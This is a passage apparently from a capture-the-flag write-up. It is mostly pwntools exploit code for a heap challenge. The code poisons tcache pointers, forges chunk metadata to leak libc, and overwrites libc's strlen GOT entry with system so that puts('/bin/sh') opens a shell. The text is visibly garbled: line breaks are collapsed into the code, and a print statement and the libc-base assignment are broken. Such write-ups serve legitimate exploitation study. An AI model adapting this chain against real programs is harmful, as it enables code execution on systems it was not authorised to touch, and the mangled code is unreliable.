'''# Poison poisoned_chunk tcache pointer to point# to tcache_perthread_struct (heap_base+0x10)tcache_struct_addr=heap_base+0x10fake_metadata=b'b'*0x18+p64(0)+p64(0x21)+p64(mangle(heap_base,tcache_struct_addr))edit(key(0x10001),key(0x20001),fake_metadata)# Now, poisoned_chunk tcache pointer will point to# tcache_perthread_struct instead of helper_chunk_b.create(key(0x33),0x18,b'a'*0x18)# Call malloc, next allocation will be placed in the tcache_perthread_struct# This malloc will go to tcached_perthread_structcreate(key(0x34),0x18,p64(0)+p64(0x7))# Now, we have successfully allocate a chunk to the tcache_perthread_struct# + we also overwrite the tcache[0xa0] size to 7, so that it is considered as full# Now, let forge the size of our poisoned_chunk to 0xa1 with the edit bugfake_metadata=b'b'*0x18+p64(0)+p64(0xa1)edit(key(0x20001),key(0x30001),fake_metadata)# Free it, because the tcache[0xa0] is full, it will go to unsorted bindelete(key(0x33))# Now, poisoned_chunk contains libc address# Leak libc address by overflowing our main_chunk via the edit bug again# (just like before when we try to leak heap baddress)payload=b'b'*0x28edit(key(0x30001),key(0x10001),payload)out=show(key(0x10001))leaked_libc_addr=u64(out[-6:].ljust(8,b'\x00'))'libc base: {hex(libc.address)}')# Fix its metadata (revert it just like before we overflow)payload=b'b'*0x18+p64(0)+p64(0xa1)edit(key(0x10001),key(0x20001),payload)'''
Code Execution.
'''# We will overwrite GOT entry of strlen in libc base with system# (__strlen_avx2 to system).# The GOT entry stored in libc.address+0x1f2090# Poison the tcache again just like before, but instead of# forging the entry to tcache_perthread_struct, forge it to# strlen GOT - 0x18 in libc.# Setup the tcache[0x50]# Remember that this allocation will still be placed in the exact same address as # our poisoned_chunk (which is adjacent to the main_chunk). The reason is because # there isn't any tcache[0x50] entries yet, so this allocation will take a place in # the unsorted bin chunk address, which is still adjacent to our main_chunk.create(key(0x33),0x38,b'a'*0x38)create(key(0x22),0x38,b'a'*0x38)delete(key(0x22))delete(key(0x33))# Now, as usual, poisoned_chunk contains address to heap chunk# Overwrite it to strlen GOT - 0x18# We can't set it directly to strlen GOT because:# - It will trigger alignment error (because the last 8 bit of strlen GOT is 0x8)## We alo can't set it to GOT - 0x8 because:# - During allocation via tcache, the entry+8 will be cleared to 0, which mean strlen# will be set to 0.# - Before we were able to fill it, the binary call puts("Rune contents:"), and because puts# has dependency to strlen, the binary will crash.# # So, the best place is to set the chunk address to GOT - 0x18 payload=b'b'*0x18+p64(0)+p64(0x51)payload+=p64(mangle(heap_base,libc.address+0x1f2098-0x18))edit(key(0x20001),key(0x30001),payload)# Allocate /bin/sh\x00. We will call puts to this chunk latercreate(b'a'*8,0x38,b'/bin/sh\x00')# Now, next allocation will be placed in strlen GOT-0x18# Overwrite strlen GOT in libc with system# __wmemcmp_avx2_movbe + _dl_find_dso_for_object@got.plt + __strncpy_avx2 + systempayload=p64(libc.address+0x2c0f0)+p64(libc.address+0x17a780)+p64(libc.symbols['system'])create(key(0x21),0x38,payload)# Now, calling puts will call system as well, which means# puts('/bin/sh') will be hijacked to system('/bin/sh')r.sendline(b'4')r.readrepeat(1)r.sendline(b'a'*0x8)# Call puts# We got shellr.interactive()